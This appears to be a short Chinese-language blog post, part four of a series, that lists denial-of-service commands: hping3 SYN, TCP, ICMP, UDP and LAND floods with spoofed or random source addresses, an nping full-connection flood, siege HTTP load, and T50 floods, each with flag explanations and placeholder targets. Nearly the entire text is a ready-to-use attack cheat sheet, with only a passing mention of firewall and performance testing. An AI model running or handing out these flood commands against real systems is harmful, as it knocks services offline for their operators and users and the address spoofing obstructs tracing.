DoS拒絕服務-工具使用hping3、nping等(四)
阿新 • • 發佈:2020-09-14
Hping3
幾乎可以定製傳送任何tcp/ip資料包,用於測試fw,埠掃描,效能測試
1 Syn Flood 2 – hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1 //一條命令搞定 3 -c 計數器,多次資料包 -d 資料包多大 -S syn包 -p 目標攻擊埠 --flood泛洪方式 4 --rand-source:隨機源地址 1.1.1.1 攻擊的目標 5 6 另外一種組合: 7 – hping3 -S -P -U -p 80 --flood --rand-source 1.1.1.1 89 TCP Flood攻擊: 10 – hping3 -SARFUP -p 80 --flood --rand-source 1.1.1.1 11 -SARFUP標記類全標記滿 12 13 ICMP Flood攻擊 14 – hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2 15 -q:安靜模式 -n:不作域名解析 -a:偽造源地址 16 17 ▪ UDP Flood 18 – hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2 19-s:指定源埠,不指定也可以 20 21 LAND攻擊 22 – 偽造源地址和目標地址都是自己,造成自己打自己 23 – hping3 -n -a 1.1.1.1 -S -d 100 -p 80 --flood 1.1.1.1
nping
TCP全連結DoS攻擊
– nping --tcp-connect --rate=10000 -c 1000000000 -q 192.168.33.135
--tcp-connect:建立tcp連線 --rate=10000:速率一萬個
Siege
– http/https 壓力測試
– siege -i -c 1000 http://1.1.1.1/a.php -A htttttp
-A 自定義http頭,隨便寫都可以
– 同時攻擊多個url,-f 使用字典
▪ /etc/siege/urls.txt
▪ T50
– t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80
– t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22